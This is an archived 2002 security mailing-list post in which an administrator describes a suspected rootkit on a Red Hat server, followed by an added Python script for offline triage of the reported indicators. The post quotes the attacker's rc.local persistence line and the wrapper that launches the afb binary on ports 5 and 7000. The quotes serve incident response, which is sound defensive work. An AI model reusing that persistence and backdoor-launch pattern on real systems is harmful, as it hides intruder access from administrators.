
hpd, afb, sc, and sn

From: Gordon Chamberlin <glac(at)visualize.com>
Date: Fri Dec 20 2002 - 16:11:31 EST


I found suspicious looking files on a Red Hat 7.1 Linux server earlier today. Can anyone confirm or deny that the machine has been hacked?

The files:
/usr/bin/hpd
/usr/bin/afb
/usr/bin/sn

The following line is in /etc/rc.local:
/usr/bin/./hdp -T38400 -t linux -d /dev/tty >>/dev/null

The contents of hpd are:
#!/bin/sh
/usr/bin/./afb -f /bin/sc -q -p 5 -h /bin/hk >/dev/null
/usr/bin/./afb -f /bin/sc -q -p 7000 -h /bin/hk >/dev/null

nmap reports the following ports open:

Port       State       Service
5/tcp      open        rje
22/tcp     open        ssh
25/tcp     open        smtp
53/tcp     open        domain
80/tcp     open        http
111/tcp    open        sunrpc
443/tcp    open        https
808/tcp    open        unknown
1024/tcp   open        kdm
3306/tcp   open        mysql
7000/tcp   open        afs3-fileserver
8009/tcp   open        ajp13

According to an rpm -V, all kinds of binaries have been changed: ps, top, netstat, ifconfig, ...

I copied a good version of ps in and found the two afb processes running.

Anyone know about this hack, what afb does and/or how they usually get in?


Embarrassedly,
 -Gordon

-- 
  Gordon Chamberlin             Software Architect
  Visualize, Inc.               
http://www.visualize.com


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: 
http://aris.securityfocus.com
Received on Fri Dec 20 17:13:40 2002
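The checks Gordon describes (rpm -V for replaced binaries, the rc.local entry, the wrapper script's arguments and the nmap port table) can be run as one offline triage pass. The following is an added example, not code or data from the original post, and it does not claim to know what afb or hpd do: it parses constructed samples that mirror what the post reports and flags the indicators a responder would chase, including that the numbers passed after -p in the wrapper coincide with ports nmap saw open. The HIDING_TOOLS list, the PACKAGED_SAMPLE stand-in for rpm -qal output and the EXPECTED_PORTS baseline are assumptions.

```python
"""Offline triage of the indicators in the post: rpm -V output, the rc.local
startup entry, the wrapper script's arguments and nmap's port table.
Added example; all samples are constructed to mirror the post, and no
claim is made about what afb/hpd actually do."""
import posixpath
import re

# Binaries a process/socket-hiding rootkit typically replaces. The post names
# ps, top, netstat and ifconfig; the rest of the set is an assumption.
HIDING_TOOLS = {"ps", "top", "netstat", "ifconfig", "ls", "find", "lsof", "login", "sshd"}

# rpm -V line: 8 flag columns (S size, M mode, 5 digest, D device, L link,
# U user, G group, T mtime) or the word "missing", an optional attribute
# letter such as "c" for config files, then the path.
RPM_LINE = re.compile(
    r"^(?P<flags>[S.][M.][5.][D.][L.][U.][G.][T.]|missing)\s+"
    r"(?:(?P<attr>[cdglr])\s+)?(?P<path>/\S+)$"
)
NMAP_LINE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+open\s+(?P<svc>\S+)", re.M)
BIN_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/")


def parse_rpm_verify(text):
    """Map each reported path to its flag string ('missing' for absent files)."""
    out = {}
    for raw in text.splitlines():
        m = RPM_LINE.match(raw.strip())
        if m:
            out[m.group("path")] = m.group("flags")
    return out


def trojaned_binaries(verify):
    """Executables under the system bin directories whose content changed.
    Only a digest (5) or size (S) mismatch counts; an mtime-only change (T)
    follows legitimate prelink/package updates and is ignored."""
    return sorted(p for p, f in verify.items()
                  if p.startswith(BIN_DIRS) and f != "missing" and ("5" in f or "S" in f))


def replaced_hiding_tools(verify):
    """Trojaned binaries that hide processes or sockets; this is why a
    known-good ps had to be copied in before the afb processes showed up."""
    return sorted(p for p in trojaned_binaries(verify)
                  if posixpath.basename(p) in HIDING_TOOLS)


def suspicious_startup_lines(rc_local, packaged_paths):
    """Startup commands worth a look: an absolute path with a '.' component
    (the /usr/bin/./hpd style in the post) or one not owned by any package.
    packaged_paths stands in for the file list rpm -qal would give."""
    findings = []
    for line in rc_local.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        cmd = stripped.split()[0]
        if not cmd.startswith("/"):
            continue  # bare names resolve via PATH; out of scope here
        reasons = []
        if "/./" in cmd:
            reasons.append("dot path component")
        if posixpath.normpath(cmd) not in packaged_paths:
            reasons.append("not owned by any package")
        if reasons:
            findings.append((stripped, reasons))
    return findings


def port_args(script):
    """Numbers following '-p' in a script (the post's wrapper passes -p 5 and
    -p 7000). Their meaning to afb is not assumed; they are only cross-checked
    against what nmap saw open."""
    return sorted({int(p) for p in re.findall(r"-p\s+(\d+)", script)})


def open_ports(nmap_text):
    return sorted({int(m.group("port")) for m in NMAP_LINE.finditer(nmap_text)})


def unexpected_open_ports(nmap_text, expected):
    """Open ports outside the host's documented role."""
    return [p for p in open_ports(nmap_text) if p not in expected]


def triage(rpm_text, rc_text, script_text, nmap_text, packaged_paths, expected_ports):
    verify = parse_rpm_verify(rpm_text)
    unexpected = unexpected_open_ports(nmap_text, expected_ports)
    return {
        "trojaned": trojaned_binaries(verify),
        "hiding_tools": replaced_hiding_tools(verify),
        "startup": suspicious_startup_lines(rc_text, packaged_paths),
        "unexpected_ports": unexpected,
        # ports the wrapper names that are also listening: the strongest
        # link between the dropped files and the nmap result
        "corroborated_ports": sorted(set(unexpected) & set(port_args(script_text))),
    }


# ---- constructed samples mirroring the post (not the poster's real output) ----
RPM_VERIFY_SAMPLE = """\
S.5....T   /bin/ps
S.5....T   /usr/bin/top
S.5....T   /bin/netstat
S.5....T   /sbin/ifconfig
.......T   /usr/bin/gcc
..5....T c /etc/rc.d/rc.local
missing    /usr/share/doc/bash-2.04/README
"""
RC_LOCAL_SAMPLE = """\
#!/bin/sh
touch /var/lock/subsys/local
/usr/bin/./hdp -T38400 -t linux -d /dev/tty >>/dev/null
"""
HPD_SAMPLE = """\
#!/bin/sh
/usr/bin/./afb -f /bin/sc -q -p 5 -h /bin/hk >/dev/null
/usr/bin/./afb -f /bin/sc -q -p 7000 -h /bin/hk >/dev/null
"""
NMAP_SAMPLE = """\
Port       State       Service
5/tcp      open        rje
22/tcp     open        ssh
25/tcp     open        smtp
53/tcp     open        domain
80/tcp     open        http
111/tcp    open        sunrpc
443/tcp    open        https
808/tcp    open        unknown
1024/tcp   open        kdm
3306/tcp   open        mysql
7000/tcp   open        afs3-fileserver
8009/tcp   open        ajp13
"""
PACKAGED_SAMPLE = {"/bin/sh", "/bin/touch", "/bin/ps", "/usr/bin/top"}  # assumed rpm -qal subset
EXPECTED_PORTS = {22, 25, 53, 80, 111, 443, 3306, 8009}  # assumed role: web/mail/dns/db host

if __name__ == "__main__":
    for key, value in triage(RPM_VERIFY_SAMPLE, RC_LOCAL_SAMPLE, HPD_SAMPLE,
                             NMAP_SAMPLE, PACKAGED_SAMPLE, EXPECTED_PORTS).items():
        print(f"{key}: {value}")
```

On a real host feed it `rpm -Va` output, /etc/rc.local, the wrapper script and an nmap scan taken from a different machine; as the post itself shows with ps, once the hiding tools are reported changed nothing the compromised host's own binaries print can be trusted, so the rpm digests and the external scan are the evidence to keep.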

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:01:55 EDT

